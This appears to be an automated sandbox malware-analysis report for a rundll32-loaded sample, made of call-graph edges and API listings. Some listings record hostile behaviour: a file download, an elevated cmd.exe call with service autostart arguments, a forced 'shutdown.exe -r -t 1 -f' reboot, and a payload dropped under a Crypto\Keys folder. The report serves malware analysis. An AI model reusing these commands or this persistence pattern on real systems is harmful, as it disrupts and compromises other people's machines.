12728->12704 12730 43e5f8a 12729->12730 12731 43e5f52 12729->12731 12730->12703 12732 43e5f84 CreateFileW 12731->12732 12732->12730 12734 4475341 12733->12734 12740 447535e 12734->12740 12742 43ebe58 12734->12742 12735 4475399 12735->12692 12737 4475359 12738 43ca390 4 API calls 12737->12738 12738->12740 12739 43ebe58 46 API calls 12739->12740 12740->12735 12740->12739 12741 43ca390 4 API calls 12740->12741 12741->12740 12743 43ebe5f 12742->12743 12744 43d0240 46 API calls 12743->12744 12745 43ebe77 12744->12745 12745->12737 12747 45d57f4 74 API calls 12746->12747 12748 45d574a 12747->12748 12749 43ebe58 46 API calls 12748->12749 12755 45d5765 12748->12755 12750 45d5760 12749->12750 12751 43ca390 4 API calls 12750->12751 12751->12755 12752 45d5701 12752->12614 12753 45d5791 12753->12752 12759 45d44d0 12753->12759 12755->12753 12756 43ebe58 46 API calls 12755->12756 12757 45d578c 12756->12757 12758 43ca390 4 API calls 12757->12758 12758->12753 12760 45d44e9 12759->12760 12779 440004c 12760->12779 12763 45d473b 12797 43cc24c 12763->12797 12765 45d4521 12768 43ebe58 46 API calls 12765->12768 12771 45d453c 12765->12771 12769 45d4537 12768->12769 12770 43ca390 4 API calls 12769->12770 12770->12771 12771->12763 12772 43ebe58 46 API calls 12771->12772 12773 43ca390 4 API calls 12771->12773 12774 45d35a4 46 API calls 12771->12774 12775 45d3568 46 API calls 12771->12775 12776 43cd280 26 API calls 12771->12776 12777 45d34f0 46 API calls 12771->12777 12792 43fff94 12771->12792 12772->12771 12773->12771 12774->12771 12775->12771 12776->12771 12777->12771 12803 44025cc 12779->12803 12782 4402420 26 API calls 12783 4400061 12782->12783 12783->12763 12784 45d4fbc 12783->12784 12785 45d4fe9 12784->12785 12786 43cd280 26 API calls 12785->12786 12787 45d502b 12786->12787 12789 45d51ac 12787->12789 12791 45d5222 12787->12791 12819 45d34f0 12787->12819 12790 43cd280 26 API calls 12789->12790 12789->12791 12790->12791 12791->12765 12793 4401198 26 API calls 12792->12793 12794 43fffab 12793->12794 12795 43ccab8 26 API calls 12794->12795 12796 43fffd6 12795->12796 12796->12771 12798 43cc27f 12797->12798 12799 43cc262 12797->12799 12798->12752 12799->12798 12802 43cc281 12799->12802 12823 43cc2c4 12799->12823 12801 43cfd20 14 API calls 12801->12802 12802->12798 12802->12801 12804 44025d7 12803->12804 12805 44025ee 12803->12805 12806 43ebe58 46 API calls 12804->12806 12808 440260d 12805->12808 12810 4402420 26 API calls 12805->12810 12807 44025e9 12806->12807 12809 43ca390 4 API calls 12807->12809 12811 4400058 12808->12811 12813 4400714 12808->12813 12809->12805 12810->12808 12811->12782 12814 440072c 12813->12814 12815 43ebe58 46 API calls 12814->12815 12818 440075e 12814->12818 12816 4400759 12815->12816 12817 43ca390 4 API calls 12816->12817 12817->12818 12818->12811 12820 45d3505 12819->12820 12821 45d3538 12820->12821 12822 43ebe58 46 API calls 12820->12822 12821->12787 12822->12821 12824 43cc2cd 12823->12824 12834 43cc2fa 12823->12834 12825 43cc32c 12824->12825 12826 43cc2ea 12824->12826 12824->12834 12827 43cc33d 12825->12827 12828 43cc333 12825->12828 12831 43cc36f 12826->12831 12826->12834 12835 43cc2f2 12826->12835 12836 43cadd4 12827->12836 12829 43cad5c SysFreeString 12828->12829 12829->12834 12832 43cc2c4 16 API calls 12831->12832 12831->12834 12832->12831 12833 43cc24c 16 API calls 12833->12835 12834->12799 12835->12833 12835->12834 12837 43cadda 12836->12837 12838 43cade0 SysFreeString 12837->12838 12839 43cadf2 12837->12839 12838->12837 12839->12834 12841 45d5d17 12840->12841 12842 43cc24c 16 API calls 12841->12842 12843 45d5d96 12842->12843 12870 45d6924 12843->12870 12846 43cc50c 26 API calls 12847 45d5dc5 12846->12847 12888 45d54dc 12847->12888 12849 45d5ded 12850 45d5e7c 12849->12850 12851 45d5df5 12849->12851 12909 43ed6b8 12850->12909 12853 43cc24c 16 API calls 12851->12853 12855 45d5e1a 12853->12855 12854 45d5e9d 12858 45d5efb 12854->12858 12859 45d5eb1 12854->12859 12894 43fe5b4 12855->12894 12865 44bcbe4 50 API calls 12858->12865 12922 44bcbe4 12859->12922 12860 43cc50c 26 API calls 12862 45d5e48 12860->12862 12900 45d3e94 12862->12900 12864 45d5e59 12866 43cc24c 16 API calls 12864->12866 12869 45d5f3a 12865->12869 12867 45d5e74 12866->12867 12867->12621 12868 45d5ed3 12868->12621 12869->12621 12872 45d6950 12870->12872 12871 45d699d 12875 45d69c8 12871->12875 12876 43ebe58 46 API calls 12871->12876 12872->12871 12873 43ebe58 46 API calls 12872->12873 12874 45d6998 12873->12874 12878 43ca390 4 API calls 12874->12878 12880 43cc24c 16 API calls 12875->12880 12877 45d69c3 12876->12877 12879 43ca390 4 API calls 12877->12879 12878->12871 12879->12875 12881 45d6a2e 12880->12881 12882 43fe5b4 50 API calls 12881->12882 12883 45d6a39 12882->12883 12884 43cc50c 26 API calls 12883->12884 12885 45d6a56 12884->12885 12886 43cc24c 16 API calls 12885->12886 12887 45d5dae 12886->12887 12887->12846 12890 45d54f6 12888->12890 12889 45d558e 12889->12849 12890->12889 12934 43f2fdc 12890->12934 12892 45d5583 12938 43f2e14 12892->12938 12895 43fe5bc 12894->12895 12896 43fe5da 12895->12896 12897 43ebe58 46 API calls 12895->12897 12896->12860 12898 43fe5d5 12897->12898 12899 43ca390 4 API calls 12898->12899 12899->12896 12901 45d3eb0 12900->12901 12902 45d3ec4 12901->12902 12903 45d3ed3 12901->12903 12994 43f2d04 12902->12994 12904 43f2d04 52 API calls 12903->12904 12906 45d3ece 12904->12906 12907 43f2e14 72 API calls 12906->12907 12908 45d3f1a 12907->12908 12908->12864 12910 43ed6f1 12909->12910 12915 43ed77c 12910->12915 12921 43ed711 12910->12921 13000 43e4cc0 12910->13000 12914 43ed749 12914->12915 12916 43e4cc0 CharUpperBuffW 12914->12916 12917 43ed866 12915->12917 12920 43ed7d4 12915->12920 12916->12915 12919 43cd280 26 API calls 12917->12919 12917->12921 12919->12917 12920->12921 13008 43f0e60 12920->13008 12921->12854 12925 44bcc1c 12922->12925 12933 44bcc0e 12922->12933 12923 44bcc7c 13024 44bd670 12923->13024 12925->12923 12926 43ebe58 46 API calls 12925->12926 12928 44bcc58 12925->12928 12925->12933 12927 44bcc53 12926->12927 12929 43ca390 4 API calls 12927->12929 12928->12923 12930 43ebe58 46 API calls 12928->12930 12929->12928 12931 44bcc77 12930->12931 12932 43ca390 4 API calls 12931->12932 12932->12923 12933->12868 12935 43f2ff1 12934->12935 12936 43f2fe5 12934->12936 12935->12892 12962 43f33f0 12936->12962 12939 43f2e31 12938->12939 12940 43f2e55 12939->12940 12942 43ebe58 46 API calls 12939->12942 12941 43f2e7d 12940->12941 12943 43ebf28 72 API calls 12940->12943 12944 43f2ea5 12941->12944 12945 43ebf28 72 API calls 12941->12945 12946 43f2e50 12942->12946 12947 43f2e78 12943->12947 12949 43f2eda 12944->12949 12953 43ebf28 72 API calls 12944->12953 12948 43f2ea0 12945->12948 12950 43ca390 4 API calls 12946->12950 12951 43ca390 4 API calls 12947->12951 12952 43ca390 4 API calls 12948->12952 12976 43f26c4 12949->12976 12950->12940 12951->12941 12952->12944 12955 43f2ed5 12953->12955 12957 43ca390 4 API calls 12955->12957 12957->12949 12958 43ebe58 46 API calls 12959 43f2f04 12958->12959 12961 43ca390 4 API calls 12959->12961 12960 43f2f09 12960->12889 12961->12960 12963 43f33f6 12962->12963 12966 43f30d8 12963->12966 12965 43f3414 12965->12935 12967 43f30e4 12966->12967 12968 43f30fe 12967->12968 12969 43f30f4 GetACP 12967->12969 12970 43f3101 GetCPInfo 12968->12970 12969->12970 12971 43f311e 12970->12971 12972 43f3135 12970->12972 12973 43ebe58 46 API calls 12971->12973 12972->12965 12974 43f3130 12973->12974 12975 43ca390 4 API calls 12974->12975 12975->12972 12977 43f26d5 12976->12977 12978 43f26f0 12976->12978 12977->12978 12980 43ebe58 46 API calls 12977->12980 12979 43f271d 12978->12979 12981 43ebf28 72 API calls 12978->12981 12982 43f2745 12979->12982 12985 43ebf28 72 API calls 12979->12985 12983 43f26eb 12980->12983 12984 43f2718 12981->12984 12989 43ebf28 72 API calls 12982->12989 12992 43f277b 12982->12992 12986 43ca390 4 API calls 12983->12986 12987 43ca390 4 API calls 12984->12987 12988 43f2740 12985->12988 12986->12978 12987->12979 12990 43ca390 4 API calls 12988->12990 12991 43f2776 12989->12991 12990->12982 12993 43ca390 4 API calls 12991->12993 12992->12958 12992->12960 12993->12992 12995 43f2d1e 12994->12995 12996 43f2d0e 12994->12996 12995->12906 12997 43f33f0 52 API calls 12996->12997 12999 43f2d1c 12996->12999 12998 43f2d51 12997->12998 12998->12906 12999->12906 13002 43e4ccf 13000->13002 13001 43e4cf0 13004 43e4cf4 13001->13004 13002->13001 13003 43e4cea CharUpperBuffW 13002->13003 13003->13001 13006 43e4d01 13004->13006 13005 43e4d2c 13005->12914 13006->13005 13007 43e4d26 CharLowerBuffW 13006->13007 13007->13005 13011 43f0fdc 13008->13011 13014 43f0e84 13011->13014 13015 43f0eaf 13014->13015 13016 43f0e96 13014->13016 13018 43f0f38 CompareStringW 13015->13018 13020 43f0f38 13016->13020 13019 43f0e7d 13018->13019 13019->12920 13021 43f0f51 13020->13021 13022 43f0fab CompareStringW 13021->13022 13023 43f0f73 13021->13023 13022->13023 13023->13019 13027 44bd140 13024->13027 13026 44bd677 13026->12933 13028 44bd154 13027->13028 13032 44bd17e 13027->13032 13029 43ebe58 46 API calls 13028->13029 13028->13032 13030 44bd179 13029->13030 13031 43ca390 4 API calls 13030->13031 13031->13032 13032->13026 13034 45d36b1 13033->13034 13035 45d36ca 13034->13035 13036 43ebe58 46 API calls 13034->13036 13037 45d3658 13035->13037 13036->13035 13038 45d3672 13037->13038 13039 45d368b 13038->13039 13040 43ebe58 46 API calls 13038->13040 13039->12645 13040->13039 13042 45d35f5 13041->13042 13043 45d3629 13042->13043 13044 43ebe58 46 API calls 13042->13044 13043->12623 13044->13043 13048 43c7238 13045->13048 13047 45b85e8 13047->12503 13049 43c724c 13048->13049 13050 43c726e GetCommandLineW 13049->13050 13051 43c7250 GetModuleFileNameW 13049->13051 13052 43c726c 13050->13052 13051->13052 13052->13047 13053 43c8c7b 13058 43c8bd4 13053->13058 13055 43c8c9f 13056 43c8cc0 CompareStringW 13055->13056 13057 43c8ce1 13056->13057 13061 43d01f4 13058->13061 13064 43d0164 13061->13064 13063 43c8be6 13063->13055 13066 43d0185 13064->13066 13065 43d01ab 13065->13063 13066->13065 13067 43cff18 MultiByteToWideChar 13066->13067 13067->13065 13068 43d1df4 13069 43d1e9b 13068->13069 13070 43d1e1a 13068->13070 13070->13069 13072 43d1a04 13070->13072 13073 43d1a2f 13072->13073 13074 43d1aa0 RaiseException 13073->13074 13079 43d1ac8 13073->13079 13091 43d1b35 13074->13091 13075 43d1b5d LoadLibraryA 13076 43d1b68 13075->13076 13080 43d1b6c GetLastError 13076->13080 13081 43d1bb7 13076->13081 13077 43d1c67 13078 43d1c6b GetLastError 13077->13078 13077->13091 13084 43d1c7c 13078->13084 13079->13075 13079->13076 13083 43d1bfe 13079->13083 13079->13091 13085 43d1b7d 13080->13085 13088 43d1bf8 FreeLibrary 13081->13088 13089 43d1bc5 13081->13089 13082 43d1c5b GetProcAddress 13082->13077 13083->13077 13083->13082 13083->13091 13086 43d1c8e RaiseException 13084->13086 13084->13091 13085->13081 13087 43d1b8f RaiseException 13085->13087 13086->13091 13087->13091 13088->13083 13089->13083 13090 43d1bcb LocalAlloc 13089->13090 13090->13083 13092 43d1bdb 13090->13092 13091->13070 13092->13083 13093 4610898 13096 43d19b8 13093->13096 13095 46108a8 13097 43d19c3 13096->13097 13100 43ca6f8 13097->13100 13101 43ca70c GetCurrentThreadId 13100->13101 13102 43ca707 13100->13102 13103 43ca742 13101->13103 13102->13101 13104 43caa44 13103->13104 13105 43ca7b5 13103->13105 13106 43caa60 13104->13106 13107 43caa71 13104->13107 13119 43ca68c 13105->13119 13123 43ca9ac 13106->13123 13109 43caa7a GetCurrentThreadId 13107->13109 13113 43caa87 13107->13113 13109->13113 13112 43caa6a 13112->13107 13114 43c6f7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 13113->13114 13115 43cab17 FreeLibrary 13113->13115 13116 43cab3f 13113->13116 13114->13113 13115->13113 13117 43cab4e ExitProcess 13116->13117 13118 43cab48 13116->13118 13118->13117 13120 43ca6d4 13119->13120 13121 43ca69c 13119->13121 13120->13095 13121->13120 13129 43d02f4 GetSystemInfo 13121->13129 13124 43ca9b6 GetStdHandle WriteFile 13123->13124 13127 43caa13 13123->13127 13130 43cb5b8 13124->13130 13127->13112 13128 43caa03 GetStdHandle WriteFile 13128->13112 13129->13121 13131 43cb5be 13130->13131 13131->13128 13132 45b7990 PeekMessageW 13133 45b7a92 13132->13133 13134 45b79b1 13132->13134 13135 45b79b7 IsWindowUnicode 13134->13135 13136 45b79c1 13134->13136 13135->13136 13137 45b79e8 PeekMessageA 13136->13137 13138 45b79d2 PeekMessageW 13136->13138 13139 45b79fc 13137->13139 13138->13139 13139->13133 13140 45b982c 9 API calls 13139->13140 13141 45b7a37 13140->13141 13141->13133 13142 45b7824 122 API calls 13141->13142 13143 45b7a44 13142->13143 13143->13133 13144 45b76dc TranslateMDISysAccel 13143->13144 13145 45b7a57 13144->13145 13145->13133 13146 45b772c 15 API calls 13145->13146 13147 45b7a64 13146->13147 13147->13133 13148 45b7694 3 API calls 13147->13148 13149 45b7a71 13148->13149 13149->13133 13150 45b7a75 TranslateMessage 13149->13150 13151 45b7a8a DispatchMessageA 13150->13151 13152 45b7a82 DispatchMessageW 13150->13152 13151->13133 13152->13133 13153 43c59b0 13154 43c59c8 13153->13154 13155 43c5c10 13153->13155 13165 43c59da 13154->13165 13168 43c5a65 Sleep 13154->13168 13156 43c5d28 13155->13156 13157 43c5bd4 13155->13157 13158 43c575c VirtualAlloc 13156->13158 13159 43c5d31 13156->13159 13163 43c5bee Sleep 13157->13163 13169 43c5c2e 13157->13169 13161 43c5797 13158->13161 13162 43c5787 13158->13162 13160 43c59e9 13177 43c5710 13162->13177 13167 43c5c04 Sleep 13163->13167 13163->13169 13165->13160 13166 43c5ac8 13165->13166 13171 43c5aa9 Sleep 13165->13171 13176 43c5ad4 13166->13176 13182 43c5694 13166->13182 13167->13157 13168->13165 13170 43c5a7b Sleep 13168->13170 13172 43c5694 VirtualAlloc 13169->13172 13173 43c5c4c 13169->13173 13170->13154 13171->13166 13175 43c5abf Sleep 13171->13175 13172->13173 13175->13165 13178 43c5758 13177->13178 13179 43c5719 13177->13179 13178->13161 13179->13178 13180 43c5724 Sleep 13179->13180 13180->13178 13181 43c573e Sleep 13180->13181 13181->13179 13186 43c5628 13182->13186 13184 43c569d VirtualAlloc 13185 43c56b4 13184->13185 13185->13176 13187 43c55c8 13186->13187 13187->13184

                              Control-flow Graph

                              APIs
                              • Sleep.KERNEL32(0000012C,00000000,04605E82), ref: 04605E03
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 04605E20
                              • Sleep.KERNEL32(0000012C,0000012C,00000000,04605E82), ref: 04605E5A
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep$DownloadFile
                              • String ID:
                              • API String ID: 2087964873-0
                              • Opcode ID: 735e44a81d933ec995c314acc19fbea75bb8d8c3189e8c9e74dcd6a166f31086
                              • Instruction ID: cab3e77c0927154d4ac0fb6515f1dc5fafe34bc72136ba0d64cc7dc72c823e91
                              • Opcode Fuzzy Hash: 735e44a81d933ec995c314acc19fbea75bb8d8c3189e8c9e74dcd6a166f31086
                              • Instruction Fuzzy Hash: 63114C70600648AFE704FB69CCA6B9E77A4EF09744F505065E9049B3E0DB70BE40CF55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,043CE79C,?,?), ref: 043CE70E
                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,043CE79C,?,?), ref: 043CE717
                                • Part of subcall function 043CE5A4: FindFirstFileW.KERNEL32(00000000,?,00000000,043CE602,?,00000001), ref: 043CE5D7
                                • Part of subcall function 043CE5A4: FindClose.KERNEL32(00000000,00000000,?,00000000,043CE602,?,00000001), ref: 043CE5E7
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                              • String ID:
                              • API String ID: 3216391948-0
                              • Opcode ID: d50a5b7bb9107df6f5f0fd0abd2a911e3e112e3dc3e0e28370efcbced102e6be
                              • Instruction ID: b402d5170fb29b6e2d039df6ccaff04d90cd6df3cc96d5d226dc16bb13987664
                              • Opcode Fuzzy Hash: d50a5b7bb9107df6f5f0fd0abd2a911e3e112e3dc3e0e28370efcbced102e6be
                              • Instruction Fuzzy Hash: AB115470A0020DABEF04EFA4D892AAEB7B9EF44304F50647DD514E7291D774BF049B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000000,043CE602,?,00000001), ref: 043CE5D7
                              • FindClose.KERNEL32(00000000,00000000,?,00000000,043CE602,?,00000001), ref: 043CE5E7
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 3bd58dca9a815ca4bbc90d0e22d6d38adf98b5f48d2e54a5c2e5b9c49b0a015e
                              • Instruction ID: d885f39dae71b3c757773792e95547146a2e6f46e2675f79c7f5d3a467550b93
                              • Opcode Fuzzy Hash: 3bd58dca9a815ca4bbc90d0e22d6d38adf98b5f48d2e54a5c2e5b9c49b0a015e
                              • Instruction Fuzzy Hash: 6AF0BE71514658AFEB10FB74CC2A94EB7ACEF442147A014A9E810D3190EB34BF109B28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,043CE3ED,?,?), ref: 043CE201
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,043CE3ED,?,?), ref: 043CE24A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,043CE3ED,?,?), ref: 043CE26C
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 043CE28A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 043CE2A8
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 043CE2C6
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 043CE2E4
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,043CE3D0,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,043CE3ED), ref: 043CE324
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,043CE3D0,?,80000001), ref: 043CE34F
                              • RegCloseKey.ADVAPI32(?,043CE3D7,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,043CE3D0,?,80000001,Software\Embarcadero\Locales), ref: 043CE3CA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Open$QueryValue$CloseFileModuleName
                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                              • API String ID: 2701450724-3496071916
                              • Opcode ID: bc516f3ad35796511b80345d2125af30de468b0dbad5484b7b895c63858e4b70
                              • Instruction ID: 1d91356604984c57366d0745c2ad235d2f61fa5efb6aa8fe576efcec7f3b9a3b
                              • Opcode Fuzzy Hash: bc516f3ad35796511b80345d2125af30de468b0dbad5484b7b895c63858e4b70
                              • Instruction Fuzzy Hash: 51510275A4021CBFEB10EBA4CC42FAEB3BCEF48704F905469B604F6181D6B0BE409B54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                                • Part of subcall function 043EEDD8: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,04603D71,04603E04,00000000,04603E2C,?,?,00000000,00000000,?), ref: 043EEE01
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 04603DA0
                              • Sleep.KERNEL32(0000001E,04603E04,00000000,04603E2C,?,?,00000000,00000000,?,?,04605E55,0000012C,00000000,04605E82), ref: 04603DA7
                                • Part of subcall function 046021C4: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0460221C
                                • Part of subcall function 046058E8: Sleep.KERNEL32(00002328,00000000,04605927,?,?,04603DEF,.exe,04605E82,0000012C,0000001E,04603E04,00000000,04603E2C,?,?,00000000), ref: 046058FE
                                • Part of subcall function 046058E8: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0460590A
                                • Part of subcall function 046058E8: Sleep.KERNEL32(0000012C,00002328,00000000,04605927,?,?,04603DEF,.exe,04605E82,0000012C,0000001E,04603E04,00000000,04603E2C,?,?), ref: 04605914
                              • Sleep.KERNEL32(0000012C,.exe,04605E82,0000012C,0000001E,04603E04,00000000,04603E2C,?,?,00000000,00000000,?,?,04605E55,0000012C), ref: 04603DF4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep$EnvironmentExecExecuteFileMoveShellVariable
                              • String ID: .exe$MpCmdRun$Obligation Feeds$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$flyer1$flyer2$flyer3
                              • API String ID: 4165743239-2642550186
                              • Opcode ID: 8057dbc2c2999eda4e48ed1f3905632ed735ecc184d0157328b3d68ab7725acb
                              • Instruction ID: 4b9c85a0cb310bc154b8255cc84d1ea519e75982cd12e4d6a03e329fb9954114
                              • Opcode Fuzzy Hash: 8057dbc2c2999eda4e48ed1f3905632ed735ecc184d0157328b3d68ab7725acb
                              • Instruction Fuzzy Hash: 90514074A001499FFB04EFA9E89299FB7B5EF48308F509565E910A73A0EB30FE45CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • EnterCriticalSection.KERNEL32(0461CC14,00000000,043CDF98,?,?,?,00000000,?,043CE860,00000000,043CE8BF,?,?,00000000,00000000,00000000), ref: 043CDEB2
